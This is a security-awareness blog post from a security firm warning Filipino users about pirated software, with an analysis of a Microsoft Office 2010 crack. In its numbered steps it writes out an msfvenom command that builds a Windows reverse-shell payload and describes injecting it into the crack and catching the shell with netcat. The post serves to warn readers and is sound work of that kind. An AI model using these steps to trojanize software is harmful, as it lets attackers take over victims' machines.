CSP-CERT® Resources:
The Danger of Using Pirated Software

by Nathu Nandwani
posted October 2018

CSP CERT® at 1st Anti-Media Piracy Summit

(Manila/Philippines) Our Chief Strategy Officer emphasized the cyber risk of using pirated software in the recently concluded Anti Media Piracy Summit. Our Red Team Vulnerability Research Group highlights what could happen if you use pirated software in this article.

Software piracy is quite prevalent in the Philippines. In a usual scenario, if you have a tech-related problem which requires a software application and you ask help from a friend who’s either working in line with technology or even an enthusiast, chances are that you’ll be able to get a pirated version of that software application. According to a study by Business Software Alliance (BSA), 64% of the software applications in the Philippines as of 2017 are unlicensed. This means for every 10 software applications, around 6 are unlicensed and that percentage reflects to around $388 million worth in commercial value.

Even though the Philippine government already imposed a law to penalize violators, it appears that the issue is still common. For instance, a few days ago, a user from Reddit posted a picture showing one of the computers used in a local transport area having a pop up saying the Windows version is not genuine. While this shows quite of a concern in the legal aspect, this also points to issues related to cyber security.

When using pirated software applications, the term "crack" is commonly heard. A "crack" is a program that patches a trial version of a software application to extend its usage and cut limitations in terms of features. The issue is, even though some of these "cracks" work as expected, they can contain malicious code leading to computers open for attackers.

An example for this is when a pirated version of Microsoft Office 2010 is used. After checking a "crack" for Microsoft Office 2010, it was found that the tool was written in a programming language based on the .NET framework because it reflected the intermediate language (IL) code through a .NET decompiler.


Seeing that this toolkit has a class named “CMemoryExecute” should already raise suspicion because this module executes a byte array directly to memory through process hijacking and is usually used in encryption tools to execute encrypted malware.


This also means that this toolkit can easily be customized to include malicious code (if it doesn’t already have) by taking advantage of that module through the following steps:

  1. Generate a reverse shell through msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > ~/Desktop/test.exe
  2. Inject intermediate language (IL) code into the toolkit’s entry point to execute the reverse shell:
  3. Once the code has been injected and the toolkit gets recompiled, if ever the so called “crack” runs in a machine packed with that reverse shell named “test.exe”, it will get injected into memory as vbc.exe which is the hijacked process in this case:
  4. If the attacker is listening through netcat, a connection pushes through and the user who ran the toolkit to get a pirated Microsoft Office gets hacked in return.

While the scenario above requires the malware (test.exe) to be shipped together with the toolkit, an advanced version of this could include the executable inside the toolkit itself by storing it in the resources or so. In general, this can happen to any .NET compiled program but due to the choice of the majority on selecting pirated software applications instead of buying them, chances of getting infected by a malicious actor is high. Therefore, investing on a licensed software application is still advantageous compared to making use of pirated ones unless of course the user wants to risk getting hacked, getting condemned by the government, or simply getting those annoying random crashes and couldn’t do something about it because support isn't available.


Other Resources:

Sunshine TV's feature about Anti-Media Piracy.